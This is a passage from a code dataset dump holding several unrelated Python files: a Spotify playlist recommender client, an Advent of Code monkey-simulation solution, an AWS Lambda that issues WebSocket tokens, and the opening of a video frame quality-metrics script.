playlists_db_path\n conn = sqlite3.connect(playlists_db_path)\n self.tracks_df = pd.read_sql('select * from tracks', conn)\n self.playlists_df = pd.read_sql('select * from playlists', conn)\n self.playlists_df['cluster'] = pd.Categorical(self.model.labels_)\n self.features_df = pd.read_sql('select * from features', conn)\n self.ratings_df = pd.read_sql('select * from ratings', conn)\n if conn:\n conn.close()\n \n self.train_scaled_data = np.loadtxt(train_data_scaled_path, delimiter=',')\n self.train_data_scaled_feats_df = pd.DataFrame(self.train_scaled_data)\n self.train_data_scaled_feats_df['cluster'] = pd.Categorical(self.model.labels_)\n self.openTSNE_df = pd.read_csv(openTSNE_path)\n self.openTSNE_df['cluster'] = pd.Categorical(self.model.labels_)\n \nclass SpotifyRecommendations():\n \"\"\"\n This Class will provide music recommendations in a form of Playlists\n Attributes:\n - model_path (str): Path to where the model is saved, should be pretrained.\n - tsne_path (str): Path to where the TSNE transformer is saved, should be pretrained.\n - scaler_path (str): Path to where the Standar Scaler transformer is saved, should be pretrained.\n - playlists_path (str): Path to where the Playlists file is saved, will represent the pool provide recommendations.\n - scaled_data_path (str): Path to where the Scaled Data is saved, all playlists used for training should be present.\n \n This function will compute the most similar or disimilar playlists given a target vector 'y' which represents the mean\n features of the user's favorite songs. Similarity is calculated based on metrics such as Cosine, Manhattan, Euclidean, etc.\n Parameters:\n - model: Trained clustering model.\n - train_data_scaled_feats_df (dataframe): Dataframe with scaled data for all the training data\n - playlists (dictionary): Dictionary with all the playlists from the .json files\n - y (np.array): user's favorite songs scaled vector\n - n (int): top n playlists to retrieve\n - metric (str): metric to use, recommended 'cityblock', 'euclidean', 'cosine'.\n - similar (bool): whether to calculate most similar or most disimilar \n - printing (bool): whether to print the results or not\n Output:\n - indices (np.array): indices of the top n playlists based on the train_data_scaled_feats_df dataframe\n\n \"\"\"\n def __init__(self, playlist_uri=None, song_name=None, sp_user=None):\n \"\"\"\n Inits class with hard coded values for the Spotify instance and gets the paths for all the models and data\n \"\"\"\n self.feat_cols_user = ['danceability', 'energy', 'key', 'loudness', 'mode', 'speechiness', 'acousticness', 'instrumentalness',\n 'liveness', 'valence', 'tempo', 'duration_ms', 'time_signature']\n\n self.playlist_uri = playlist_uri\n self.song_name = song_name\n self.len_of_favs = 'all_time'\n self.log_output = None\n sequential =['Greys', 'Purples', 'Blues', 'Greens', 'Oranges', 'Reds','YlOrBr', 'YlOrRd', 'OrRd', 'PuRd', \n 'RdPu', 'BuPu', 'GnBu', 'PuBu', 'YlGnBu', 'PuBuGn', 'BuGn', 'YlGn']\n self.color = random.choice(sequential)\n \n load_dotenv()\n\n\n\n SPOTIPY_CLIENT_ID = os.getenv('SPOTIPY_CLIENT_ID')\n\n SPOTIPY_CLIENT_SECRET = os.getenv('SPOTIPY_CLIENT_SECRET')\n\n SPOTIPY_REDIRECT_URI = os.getenv('SPOTIPY_REDIRECT_URI')\n\n\n\n\n# Defining scope to read user playlist and write playlist to user\n\n # scope = 'user-library-read user-follow-read playlist-modify-private playlist-modify user-top-read'\n\n # spotify = spotipy.Spotify(auth_manager=SpotifyOAuth(scope=scope))\n if self.playlist_uri is not None:\n # self.sp = spotipy.Spotify(client_credentials_manager = SpotifyClientCredentials())\n self.sp = spotipy.Spotify(auth_manager = SpotifyOAuth(client_id = SPOTIPY_CLIENT_ID,\n client_secret = SPOTIPY_CLIENT_SECRET,\n redirect_uri = SPOTIPY_REDIRECT_URI))\n else:\n # Hardcoded init variables\n # Defining scope to read user playlist and write playlist to user\n #self.scope = 'user-library-read user-follow-read playlist-modify-private playlist-modify'\n # self.scope = \"user-library-read\"\n self.scope = \"user-library-read user-follow-read playlist-modify-private playlist-modify user-top-read\"\n self.sp_oauth = SpotifyOAuth(scope = self.scope, username=sp_user)\n try: \n token_info = self.sp_oauth.get_cached_token()\n access_token = token_info['access_token']\n self.sp = spotipy.Spotify(access_token)\n #token = spotipy.util.prompt_for_user_token(sp_user, self.scope)\n #self.sp = spotipy.Spotify(auth=token)\n #self.sp_oauth = SpotifyOAuth(scope = self.scope, requests_session=True, requests_timeout=10, username=sp_user)\n #self.sp = spotipy.Spotify(auth_manager=self.sp_oauth)\n except:\n self.sp = None\n #print(self.sp.me())\n\n def init_sp(self, response_url):\n code = self.sp_oauth.parse_response_code(response_url)\n #print(self.sp_oauth.get_access_token(code))\n token_info = self.sp_oauth.get_access_token(code, check_cache=False)\n access_token = token_info['access_token']\n self.sp = spotipy.Spotify(access_token)\n\n def get_html_for_login(self):\n auth_url = self.sp_oauth.get_authorize_url()\n return auth_url\n\n def set_ml_model(self, ml_model):\n # Model loading\n self.model = ml_model.model\n self.tsne_transformer = ml_model.tsne_transformer\n self.scaler = ml_model.scaler\n\n # Data loading\n self.tracks_df = ml_model.tracks_df\n self.playlists_df = ml_model.playlists_df\n self.features_df = ml_model.features_df\n self.ratings_df = ml_model.ratings_df\n self.train_data_scaled_feats_df = ml_model.train_data_scaled_feats_df\n self.openTSNE_df = ml_model.openTSNE_df\n\n def get_audio_features_df(self, track_uris_list=None, playlist_pids_list=None):\n self.log_output('Getting Audio features for the tracks')\n # Get all track_uri for playlists\n if playlist_pids_list is not None:\n self.log_output('Getting audio features for tracks in Top Playlists in the Cluster\\n' + ','.join([str(pid) for pid in playlist_pids_list]))\n ratings_df = self.ratings_df[self.ratings_df['pid'].isin(playlist_pids_list)].copy()\n tracks_df = self.tracks_df[self.tracks_df['track_id'].isin(ratings_df['track_id'].values)].copy()\n track_uris_list = tracks_df['track_uri'].values\n self.log_output('Tracks in this list: ' + str(len(track_uris_list)))\n \n self.log_output('Unique tracks in this list: ' + str(len(set(track_uris_list))))\n # Find audio features if track_uri is already in the database:\n tracks_df = self.tracks_df[self.tracks_df['track_uri'].isin(set(track_uris_list))][['track_id', 'track_uri']].copy()\n exist_audio_feats_df = self.features_df[self.features_df['track_id'].isin(tracks_df['track_id'].values)].copy()\n exist_audio_feats_df = exist_audio_feats_df.merge(tracks_df, on='track_id')\n exist_audio_feats_df.drop(columns='track_id', inplace=True)\n exist_audio_feats_df.rename(columns={'track_uri':'uri'}, inplace=True)\n if len(exist_audio_feats_df) == len(set(track_uris_list)):\n self.log_output('Got all audio features from database for tracks: ' + str(len(exist_audio_feats_df)))\n return exist_audio_feats_df\n \n track_uris_list = list(set(track_uris_list) - set(tracks_df['track_uri'].tolist()))\n\n # Extract audio features from Spotify\n audio_feats = []\n chunks_uris = [track_uris_list[i:i + 100] for i in range(0, len(track_uris_list), 100)]\n for chunk in chunks_uris:\n for _ in range(5):\n try:\n chunk_audio_feats = self.sp.audio_features(chunk)\n audio_feats.append(chunk_audio_feats)\n except Exception as e: \n print(e)\n print('chunk: {}'.format(chunk))\n else:\n break\n else:\n print('Everything failed')\n \n audio_feats_df = pd.DataFrame([item for sublist in audio_feats for item in sublist if item])\n track_uris_list = audio_feats_df['id'].tolist()\n audio_feats_df = audio_feats_df[self.feat_cols_user]\n audio_feats_df['uri'] = track_uris_list\n #audio_feats_df.insert(column='uri', value=track_uris_list)\n self.log_output('Extracted audio features from Spotify: ' + str(len(audio_feats_df)))\n if len(exist_audio_feats_df) > 0:\n self.log_output('Got some audio features from database for tracks: ' + str(len(exist_audio_feats_df)))\n audio_feats_df = pd.concat([exist_audio_feats_df, audio_feats_df])\n return audio_feats_df\n\n def get_tracks_from_playlist_or_user_favorites(self):\n if self.playlist_uri:\n self.log_output('---\\nGetting all tracks for Playlist')\n # Get all tracks in the playlist\n results = self.sp.playlist(self.playlist_uri)['tracks']\n tracks = results['items']\n while results['next']:\n results = self.sp.next(results)\n tracks.extend(results['items'])\n else:\n self.log_output('Getting all tracks for User Favorites')\n \"Get all favorite tracks from current user and return them in a dataframe\"\n results = self.sp.current_user_saved_tracks()\n tracks = results['items']\n while results['next']:\n results = self.sp.next(results)\n tracks.extend(results['items'])\n\n songs_df = pd.json_normalize(tracks, record_path=['track', 'artists'], meta=[['added_at'], ['track', 'id'], ['track', 'name']])\n songs_df = songs_df.drop_duplicates(subset='track.id', keep=\"first\")\n songs_df['added_at'] = pd.to_datetime(songs_df['added_at'])\n songs_df = songs_df.sort_values(by='added_at', ascending=True).set_index('added_at')\n songs_df = songs_df[['name', 'id', 'track.id', 'track.name']]\n songs_df.rename(columns={'track.id':'uri', 'track.name': 'song', 'name': 'artist', 'id': 'artist_uri'}, inplace=True)\n self.artist_uri = songs_df['artist_uri'].tolist()\n self.log_output('Found unique tracks: ' + str(len(songs_df)))\n return songs_df\n \n # GET TRACK ID FROM TRACK NAME IN TRACK DATA BASE\n # Get the audio features for the track \n # drop the track id from this new filtered dataframe\n def get_track_uri_from_track_name(self):\n #self.log_output('Getting track uri from track name: ' + track_name)\n #df = self.tracks_df[self.tracks_df['track_name'].str.lower() == self.song_name.lower()]['track_uri'].values[0]\n return self.tracks_df[self.tracks_df['track_name'].str.lower() == self.song_name.lower()]['track_uri'].values[0]\n \n def get_audio_features_from_track_name(self, track_name):\n \n track_id = self.tracks_df[self.tracks_df['track_name'].str.lower() == track_name.lower()]['track_id'].values[0]\n # get audio features from track id\n audio_feats_df = self.features_df[self.features_df['track_id'] == track_id].copy()\n audio_feats_df.drop(columns='track_id', inplace=True)\n self.new = np.array(audio_feats_df).reshape(1, -1)\n return self.new\n\n # Get labels from model and predict user cluster\n def get_top_n_playlist_track(self, metric='cityblock', similar=True):\n try:\n self.new\n except:\n self.get_audio_features_from_track_name(self.song_name)\n self.user_cluster = self.model.predict(self.new)\n \n # Slice df for the predicted cluster and get Playlist IDs (PIDs)\n df_slice = self.train_data_scaled_feats_df[self.train_data_scaled_feats_df['cluster']==self.user_cluster[0]]\n df_slice = df_slice.drop(['cluster'], axis=1)\n indices = self.train_data_scaled_feats_df[self.train_data_scaled_feats_df['cluster']==self.user_cluster[0]].reset_index()['index'].to_numpy() # PIDs for the cluster\n \n # Convert df slice to numpy, compute similarities and grab the top n PIDs\n sliced_data_array = df_slice.to_numpy()\n if similar:\n simi = cdist(sliced_data_array, self.new, metric=metric).argsort(axis=None)[:10]\n else:\n simi = cdist(sliced_data_array, self.new, metric=metric).argsort(axis=None)[-10:]\n self.song_top_playlists = indices[simi]\n\n return self.song_top_playlists\n\n \n\n def get_tracks_audio_features(self): \n \"Extract audio features from each track from the user's favorite tracks and return a dataframe\"\n songs_df = self.get_tracks_from_playlist_or_user_favorites()\n if self.len_of_favs == 'last_month':\n songs_df = songs_df.last('1M')\n elif self.len_of_favs == '6_months':\n songs_df = songs_df.last('6M')\n else:\n pass\n\n track_uris = songs_df['uri'].tolist()\n audio_feats_df = self.get_audio_features_df(track_uris_list=track_uris)\n self.songs_feats_df = songs_df.merge(audio_feats_df, how='right', on=\"uri\")\n\n def get_raw_y(self):\n \"Get user 'y' vector without scaling\"\n try:\n self.songs_feats_df\n except:\n self.get_tracks_audio_features()\n\n self.raw_y = self.songs_feats_df[self.feat_cols_user].mean()\n return self.raw_y\n\n def get_scaled_y_vector(self):\n \"Get user 'y' vector after scaling in a numpy array with shape of (1,n)\"\n try:\n self.raw_y # Checks if it exist else runs the function to get the variable\n except:\n self.get_raw_y()\n \n self.scaled_y = self.scaler.transform(np.array(self.raw_y).reshape(1,-1))\n return self.scaled_y\n\n def get_top_n_playlists(self, n=10, metric='cityblock', similar=True, printing=False):\n \"\"\"\n This function will compute the most similar or disimilar playlists given a target vector 'y' which represents the mean\n features of the user's favorite songs. Similarity is calculated based on metrics such as Cosine, Manhattan, Euclidean, etc.\n Parameters:\n - model: Trained clustering model.\n - train_data_scaled_feats_df (dataframe): Dataframe with scaled data for all the training data\n - playlists (dictionary): Dictionary with all the playlists from the .json files\n - scaled_y (np.array): user's favorite songs scaled vector\n - n (int): top n playlists to retrieve\n - metric (str): metric to use, recommended 'cityblock', 'euclidean', 'cosine'.\n - similar (bool): whether to calculate most similar or most disimilar \n - printing (bool): whether to print the results or not\n Output:\n - top_playlists (np.array): indices of the top n playlists based on the train_data_scaled_feats_df dataframe\n \n \"\"\"\n try:\n self.scaled_y\n except:\n self.get_scaled_y_vector()\n\n # Get labels from model and predict user cluster\n self.user_cluster = self.model.predict(self.scaled_y)\n \n # Slice df for the predicted cluster and get Playlist IDs (PIDs)\n df_slice = self.train_data_scaled_feats_df[self.train_data_scaled_feats_df['cluster']==self.user_cluster[0]]\n df_slice = df_slice.drop(['cluster'], axis=1)\n indices = self.train_data_scaled_feats_df[self.train_data_scaled_feats_df['cluster']==self.user_cluster[0]].reset_index()['index'].to_numpy() # PIDs for the cluster\n \n # Convert df slice to numpy, compute similarities and grab the top n PIDs\n sliced_data_array = df_slice.to_numpy()\n if similar:\n simi = cdist(sliced_data_array, self.scaled_y, metric=metric).argsort(axis=None)[:n]\n else:\n simi = cdist(sliced_data_array, self.scaled_y, metric=metric).argsort(axis=None)[-n:]\n self.top_playlists = indices[simi]\n \n if printing:\n for idx in self.top_playlists:\n self.log_output('---')\n self.log_output('Playlist: {}\\tpid:{}'.format(self.playlists_df[self.playlists_df['pid'] == idx]['name'].iloc[0], idx))\n ratings_df = self.ratings_df[self.ratings_df['pid'] == idx].copy()\n tracks_df = self.tracks_df[self.tracks_df['track_id'].isin(ratings_df['track_id'].values)].copy()\n for _, song in tracks_df.iloc[0:3].iterrows():\n self.log_output('Artist: {}\\t Song:{}'.format(song['artist_name'], song['track_name']))\n self.log_output('---')\n \n return self.top_playlists\n\n def get_songs_recommendations(self,n=30, printing=False):\n \"\"\"\n This function computes the variance, of each song in the given playlists, to the user's favorite songs (raw_y)\n Parameters:\n - n (int): number of songs to recommend, default to 30.\n - printing (bool): Flag to print or not the song recommendations, default to False.\n \"\"\"\n try:\n self.top_playlists\n except:\n self.get_top_n_playlists(printing=True)\n\n playlist_audio_features_df = self.get_audio_features_df(playlist_pids_list=self.top_playlists)\n array_audio_feats = playlist_audio_features_df[self.feat_cols_user].to_numpy()\n \n y_vector = np.array(self.raw_y).reshape(1,-1)\n low_variance_indices = np.sum(np.square((y_vector-array_audio_feats)),axis=1).argsort(axis=None)\n self.song_uris = playlist_audio_features_df.loc[low_variance_indices]['uri']\n self.song_uris.drop_duplicates(inplace=True)\n self.song_uris = self.song_uris[:n]\n\n if printing:\n for uri in self.song_uris:\n print('Song: {}'.format(self.sp.track(uri)['name']))\n print('Artist: {}\\n'.format(self.sp.track(uri)['artists'][0]['name']))\n\n return self.song_uris\n \n # Get audio features form a song name\n def get_song_recommendation_from_song_name(self, n=30, printing=False):\n \"\"\"\n This function computes the variance, of each song in the given playlists, to the user's favorite songs (raw_y)\n Parameters:\n - song_name (str): name of the song to recommend\n - n (int): number of songs to recommend, default to 30.\n - printing (bool): Flag to print or not the song recommendations, default to False.\n \"\"\"\n try:\n self.song_top_playlists \n except:\n self.get_top_n_playlist_track()\n\n playlist_audio_features_df = self.get_audio_features_df(playlist_pids_list=self.song_top_playlists)\n array_audio_feats = playlist_audio_features_df[self.feat_cols_user].to_numpy()\n \n y_vector = self.new\n low_variance_indices = np.sum(np.square((y_vector-array_audio_feats)),axis=1).argsort(axis=None)\n self.song_uris = playlist_audio_features_df.loc[low_variance_indices]['uri']\n self.song_uris.drop_duplicates(inplace=True)\n self.song_uris = self.song_uris[:n]\n\n if printing:\n for uri in self.song_uris:\n print('Song: {}'.format(self.sp.track(uri)['name']))\n print('Artist: {}\\n'.format(self.sp.track(uri)['artists'][0]['name']))\n\n return self.song_uris\n\n def build_spotify_playlist(self, playlist_name='Machine Learning Playlist', \n description='Hell yeah, this is a Machine Learning Playlist generated on {}'.format(datetime.date.today().strftime(\"%B %d, %Y\"))):\n \"\"\"\n Build and Publish Spotify Playlist\n Parameters:\n - playlist_name (str): Name of playlist.\n - decription (str): Description of playlist.\n - target (str): 'user' or 'playlist', user will use user's favorite tracks and playlist will \n \"\"\"\n try:\n self.song_uris\n except:\n self.get_songs_recommendations()\n\n items = self.song_uris.to_list()\n #user_id = self.sp.current_user()['id']\n #new_playlist = self.sp.user_playlist_create(user_id, playlist_name, description=description)\n #self.sp.playlist_add_items(new_playlist['id'],items=items)\n return items\n\n\n def get_genre_wordcloud_fig(self):\n \"Get Spotify Wrapped for current user\"\n try:\n self.artist_uri\n except:\n self.get_tracks_from_playlist_or_user_favorites()\n\n if self.playlist_uri is None:\n user = self.sp.current_user()['display_name']\n followers = self.sp.current_user()['followers']['total']\n self.log_output(\"Hello {}!\".format(user))\n self.log_output(\"We are happy that you are using our product. Let's see some of your personal Spotify stats.\\n\")\n\n if followers >= 1:\n self.log_output(\"At this moment you have a total of {} followers, that's not bad at all!\\nThey know you have an amazing music taste.\\n\".format(followers))\n else:\n self.log_output(\"Ouch, at this moment you don't have any followers, let me know if you want me to follow you. I'll be happy to see what type of music you listen to.\\n\")\n\n top_artists = []\n genres = []\n try:\n for artist in self.sp.current_user_top_artists(time_range='long_term')['items']:\n top_artists.append(artist['name'])\n genres.append(artist['genres'])\n self.log_output(\"These are your top artist of all time:\")\n for i in top_artists[:5]:\n self.log_output(i)\n self.log_output(\"\\n\")\n except:\n self.log_output(\"Ooops, it seems that you don't have top artists at the moment.\\n\")\n\n try:\n self.log_output(\"And these are your top tracks of all time:\")\n for i in self.sp.current_user_top_tracks(time_range='long_term')['items'][:5]:\n self.log_output(\"{} - {}\".format(i['name'], i['artists'][0]['name']))\n except:\n self.log_output(\"Ooops, it seems that you don't have top tracks at the moment.\\n\")\n\n genres = []\n for artist in self.artist_uri:\n genres.append(self.sp.artist(artist)['genres'])\n\n text = [item for sublist in genres for item in sublist]\n text = ' '.join(text)\n wc = WordCloud(background_color ='white',relative_scaling=0, width=500, height=500, colormap=self.color).generate(text)\n fig, ax = plt.subplots(1, 1, figsize=(5, 5))\n ax.imshow(wc, interpolation='bilinear')\n ax.axis(\"off\")\n ax.title.set_text('Genres you listen to the most\\n')\n return fig\n\n def get_playlist_wordcloud_fig(self): \n # User Playlist Cluster\n text = ' '.join(self.playlists_df[self.playlists_df['cluster']==self.user_cluster[0]][\"name\"])\n wc = WordCloud(background_color ='white',relative_scaling=0, width=500, height=500, colormap=self.color).generate(text)\n fig, ax = plt.subplots(1, 1, figsize=(5, 5))\n ax.imshow(wc, interpolation='bilinear')\n ax.axis(\"off\")\n ax.title.set_text('Playlist names in your cluster {}\\n'.format(self.user_cluster))\n return fig\n\n def get_user_cluster_all_fig(self):\n # Transform user fav songs to TSNE to plot in vector space\n try:\n self.scaled_y\n except:\n self.get_scaled_y_vector()\n try:\n self.user_cluster\n except:\n self.user_cluster = self.model.predict(self.scaled_y)\n \n user_tsne = self.tsne_transformer.transform(self.scaled_y)[0]\n\n # Blob all clusters\n fig, ax = plt.subplots(1, 1, figsize=(5, 5))\n sns.scatterplot(ax=ax, x='X', y='Y', hue='cluster', style='cluster', data=self.openTSNE_df, legend=None)\n ax.scatter(x=user_tsne[0], y=user_tsne[1], color='yellow', marker='*', s=500)\n ax.title.set_text('You (Star) are here in the 17 Clusters')\n return fig\n #plt.show()\n\n def get_user_cluster_single_fig(self):\n try:\n self.scaled_y\n except:\n self.get_scaled_y_vector()\n try:\n self.user_cluster\n except:\n self.user_cluster = self.model.predict(self.scaled_y)\n \n user_tsne = self.tsne_transformer.transform(self.scaled_y)[0]\n\n # Blob user cluster\n palette = {c:'purple' if c==self.user_cluster else 'darkgrey' for c in self.openTSNE_df.cluster.unique()}\n fig, ax = plt.subplots(1, 1, figsize=(5, 5))\n sns.scatterplot(ax=ax, x='X', y='Y', hue='cluster', style='cluster', data=self.openTSNE_df, legend=None, palette=palette)\n ax.scatter(x=user_tsne[0], y=user_tsne[1], color='yellow', marker='*', s=500)\n ax.title.set_text('You are in cluster {}'.format(self.user_cluster))\n return fig\n #plt.show()\n\n def __str__(self):\n return 'Spotify Recommender System with model: {} on {} playlists.'.format(self.model, len(self.train_data_scaled_feats_df))\n\n# Examples on how to use it\n# Need to call SpotifyRecommendations with the given paths for the models and data\n#x = SpotifyRecommendations(model_path, tsne_path, scaler_path, playlists_path, train_data_scaled_path)\n\n# This will build a playlist based on the current user logged in\n#x.build_spotify_playlist()\n\n# This will build a playlist based on a playlist\n#x.build_spotify_playlist(playlist='71vjvXmodX7GgWNV7oOb64')\n\n# Fine tune the recommendations\n# n: number of similar playlists\n# metric: type of metric, you can try 'euclidean', 'cosine', 'cityblock'\n# similar: True for similar False for longest distance but still within the same cluster\n\n#x.get_top_n_playlists(n=10, metric='cityblock', similar=True, printing=False) # Fine tune for current user\n# After tuning, run againn build_spotify_playlist() or build_spotify_playlist()\n\n# Examples:\n#x.build_spotify_playlist(playlist='71vjvXmodX7GgWNV7oOb64') # From a previously generated playlist\n#x.build_spotify_playlist(playlist_name = 'On User') # On current user but giving a playlist name\n#x.build_spotify_playlist(playlist_name = 'Metal Essentials', playlist='37i9dQZF1DWWOaP4H0w5b0') # Based on a Metal essentials playlist\n#x.build_spotify_playlist(playlist_name = 'Classical Essentials', playlist='37i9dQZF1DWWEJlAGA9gs0') # Based on a Classical essentials playlist\n#x.build_spotify_playlist() # On current user with default values\n#x.get_genre_wordcloud_fig()\n\nclass SpotifyAPI(object):\n access_token = None\n access_token_expires = datetime.datetime.now()\n access_token_did_expire = True\n client_id = None\n client_secret = None\n token_url = \"https://accounts.spotify.com/api/token\"\n\n def __init__(self, client_id, client_secret, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.client_id = client_id\n self.client_secret = client_secret\n\n def get_client_credentials(self):\n #Returns a base64 encoded string\n client_id = self.client_id\n client_secret = self.client_secret\n if client_secret == None or client_id == None:\n raise Exception(\"You must set client_id and client_secret\")\n client_creds = f\"{client_id}:{client_secret}\"\n client_creds_b64 = base64.b64encode(client_creds.encode())\n return client_creds_b64.decode()\n\n def get_token_headers(self):\n client_creds_b64 = self.get_client_credentials()\n return {\n \"Authorization\": f\"Basic {client_creds_b64}\" \n }\n\n def get_token_data(self):\n return {\n \"grant_type\": \"client_credentials\"\n }\n\n def perform_auth(self):\n token_url = self.token_url\n token_data = self.get_token_data()\n token_headers = self.get_token_headers()\n r = requests.post(token_url, data=token_data, headers=token_headers)\n if r.status_code not in range(200, 299): \n raise Exception(\"Could not authenticate client\")\n #return False\n data = r.json()\n now = datetime.datetime.now()\n access_token = data['access_token']\n expires_in = data['expires_in'] # seconds\n expires = now + datetime.timedelta(seconds=expires_in)\n self.access_token = access_token\n self.access_token_expires = expires \n self.access_token_did_expire = expires < now\n return True\n \n def get_access_token(self):\n token = self.access_token\n expires = self.access_token_expires\n now = datetime.datetime.now()\n if expires < now:\n self.perform_auth()\n return self.get_access_token()\n elif token == None:\n self.perform_auth()\n return self.get_access_token()\n return token\n\n def get_resource_header(self):\n access_token = self.get_access_token()\n headers = {\n \"Authorization\": f\"Bearer {access_token}\"\n } \n return headers\n\n def base_search(self, query_params):\n headers = self.get_resource_header()\n #print(headers)\n endpoint = \"https://api.spotify.com/v1/search\"\n lookup_url = f\"{endpoint}?{query_params}\"\n #print(lookup_url)\n r = requests.get(lookup_url, headers=headers)\n if r.status_code not in range(200, 299):\n return {}\n #print(r.json())\n return r.json()\n\n def search(self, query=None, operator=None, operator_query=None, search_type='playlist'):\n if query == None:\n raise Exception(\"A query is required\")\n if isinstance(query, dict):\n query = \" \".join([f\"{k}:{v}\" for k,v in query.items()])\n if operator != None and operator_query != None:\n if operator.lower() == \"or\" or operator == \"not\":\n operator = operator.upper()\n if isinstance(operator_query, str):\n query = f\"{query} {operator} {operator_query}\"\n query_params = urlencode({\"q\": query, \"type\": search_type.lower()})\n #print(query_params)\n return self.base_search(query_params)\n \n","repo_name":"kshitijzutshi/DAMG7245-Final-Project","sub_path":"streamlit/spotipy_client.py","file_name":"spotipy_client.py","file_ext":"py","file_size_in_byte":38496,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"34"} +{"seq_id":"347884913","text":"import re\n\nwith open(\"AdventOfCode_2022/Day11/input.txt\", \"r\") as fp:\n input = [line.rstrip() for line in fp.readlines()]\n\nthings = []\nfor i in range(0, len(input), 7):\n things.append(input[i:i+6])\n\nsplitted_things = []\nfor thing in things:\n splitted_thing = []\n for line in thing:\n splitted_thing.append(line.split())\n splitted_things.append(splitted_thing)\n\n\nclass Monkey:\n def __init__(self, id, items, operation, test, monkey_true, monkey_false):\n self.id = id\n self.items = items\n self.operator = operation[0]\n self.num = operation[1]\n self.test = test\n self.monkey_true = monkey_true\n self.monkey_false = monkey_false\n self.thrown_items = 0\n\n def inspect(self):\n item = self.items[0]\n operator = self.operator\n if self.num == 'old':\n num = item\n else:\n num = int(self.num)\n if operator == '+':\n self.items[0] = item + num\n return self.items[0]\n if operator == '*':\n self.items[0] = item * num\n return self.items[0]\n\n def get_bored(self):\n self.items[0] = self.items[0] // 3\n return self.items[0]\n\n def throw_to(self):\n if self.items[0] % int(self.test) == 0:\n return self.monkey_true\n else:\n return self.monkey_false\n\n def __str__(self):\n return 'Name: ' + self.id + ' Items: ' + str(self.items) + ' Thrown shit: ' + str(self.thrown_items)\n\n\ndef get_items(items_raw):\n items = []\n for i in range(2, len(items_raw)):\n items.append(int(re.findall(r'\\d+', items_raw[i])[0]))\n return items\n\n\ndef get_operation(operation_raw):\n operation = []\n operation.extend([operation_raw[4], operation_raw[5]])\n return operation\n\n\ndef throw_item(item, monkey_from, monkey_to, monkeys):\n monkeys[monkey_from].items.pop(0)\n monkeys[monkey_to].items.append(item)\n monkeys[monkey_from].thrown_items += 1\n\n\ndef init_monkey(monkey_raw):\n monkid = monkey_raw[0][1][:-1]\n items = get_items(monkey_raw[1])\n print(items)\n operation = get_operation(monkey_raw[2])\n test = monkey_raw[3][3]\n monkey_true = monkey_raw[4][5]\n monkey_false = monkey_raw[5][5]\n return Monkey(monkid, items, operation, test, monkey_true, monkey_false)\n\n\ndef init_monkeys(input):\n monkeys = []\n for monkey_raw in input:\n monkeys.append(init_monkey(monkey_raw))\n return(monkeys)\n\n\ndef play_round(monkey, monkeys):\n items = monkey.items\n while len(items) > 0:\n print('inspected:', monkey.items[0], ' now: ', monkey.inspect())\n print('bored division:', monkey.get_bored())\n print('throw ', monkey.items[0], ' to monkey:', monkey.throw_to())\n throw_item(monkey.items[0], int(monkey.id),\n int(monkey.throw_to()), monkeys)\n\n\nmonkeys = init_monkeys(splitted_things)\n\nfor _ in range(20):\n for monkey in monkeys:\n play_round(monkey, monkeys)\n\nresult = [monkey.thrown_items for monkey in monkeys]\nresult.sort(reverse=True)\n\nmonkey_business = result[0]*result[1]\n\nprint(monkey_business)\n# print([str(monkey) for monkey in monkeys])\n","repo_name":"Sookie188/AdventOfCode","sub_path":"AdventOfCode_2022/Day11/Day11_1.py","file_name":"Day11_1.py","file_ext":"py","file_size_in_byte":3168,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"71968572257","text":"import boto3\nimport datetime\nimport hashlib\nimport json\n\ndynamodb = boto3.resource('dynamodb')\nconnections = dynamodb.Table('flexible-reversi-tokens')\n\ndef lambda_handler(event, context):\n # クライアントの宛先情報(WebSocketの接続ID)\n connectionId = event.get('requestContext', {}).get('connectionId')\n \n # クライアントの宛先情報(API GatewayのURL)\n domainName = event.get('requestContext',{}).get('domainName')\n stage = event.get('requestContext',{}).get('stage')\n endpointUrl = F\"https://{domainName}/{stage}\"\n \n # 現在時刻\n now = datetime.datetime.now()\n nowString = (now.strftime('%Y-%m-%d %H:%M:%S.%f'))\n print(nowString)\n \n # トークンの有効期限\n expirationDatetime = now + datetime.timedelta(hours=3)\n \n # 現在時刻から新規にトークンを生成する。トークンは以後の通信でクライアントの識別に用いる。\n token = hashlib.sha256(nowString.encode('utf-8')).hexdigest()\n print(token)\n \n # トークン、API Gateway URL、トークン有効期限、WebSocket 接続ID、をDBに保存する。\n response = connections.put_item(Item={\n 'token': token,\n 'endpointUrl': endpointUrl,\n 'expirationDatetime': int(expirationDatetime.timestamp()),\n 'connectionId': connectionId,\n 'nickname': ''\n })\n print(response)\n \n # クライアントにトークンを送る。\n am = boto3.client('apigatewaymanagementapi', endpoint_url=endpointUrl)\n _ = am.post_to_connection(ConnectionId=connectionId, Data=json.dumps({\"dataType\":\"newToken\", \"data\":{\"token\": token}}))\n \n return {\n 'statusCode': 200,\n 'body': json.dumps('new token generated.')\n }\n","repo_name":"kusa-mochi/flexible-reversi","sub_path":"server-side/lambda/flexibleReversiNewToken/lambda_function.py","file_name":"lambda_function.py","file_ext":"py","file_size_in_byte":1762,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"42797427353","text":"import block as Blockiness\nimport blurv3 as Blurriness\nimport contrastAndColorMetric as CCMetric\nimport noisev1 as Noise\nimport nrqe_metrics as NRQEmetrics\nimport frameExtraction\nimport os.path\nimport cv2\nimport brisque\nimport numpy as np\nimport time\nimport csv\n\ndef addFrameStats(input_list, out_list):\n out_list.append( np.average(input_list) )\n out_list.append( np.max(input_list) )\n out_list.append( np.min(input_list) )\n\ndef frameQualityLoop(framesfolder_path, vidname):\n brisq = brisque.BRISQUE()\n\n # lists of each frame's metrics\n blockiness_list = []\n blurriness_list = []\n color_list = [ [], [], [], [], [], [], [], []]\n contrast_list = [ [], [], [], [], [], [], [], [], []]\n noise_list = []\n brisque_list = []\n\n # list of each frame's pixel values\n frame_data = []\n\n frame_list = os.listdir(framesfolder_path)\n frame_list.sort()\n \n start_time = time.perf_counter()\n j = 1\n for frame in frame_list:\n time_elapsed = time.perf_counter() - start_time\n if (time_elapsed) > (60 * j):\n print(\"frame: \", frame)\n print(\"time_elapsed: \", time_elapsed)\n j += 1\n #start_frame = time.perf_counter()\n full_path = framesfolder_path + frame\n\n # some metrics require frame to already be read with opencv\n cv_frame = cv2.imread(full_path)\n # some metrics require an array of frame data. So build it\n 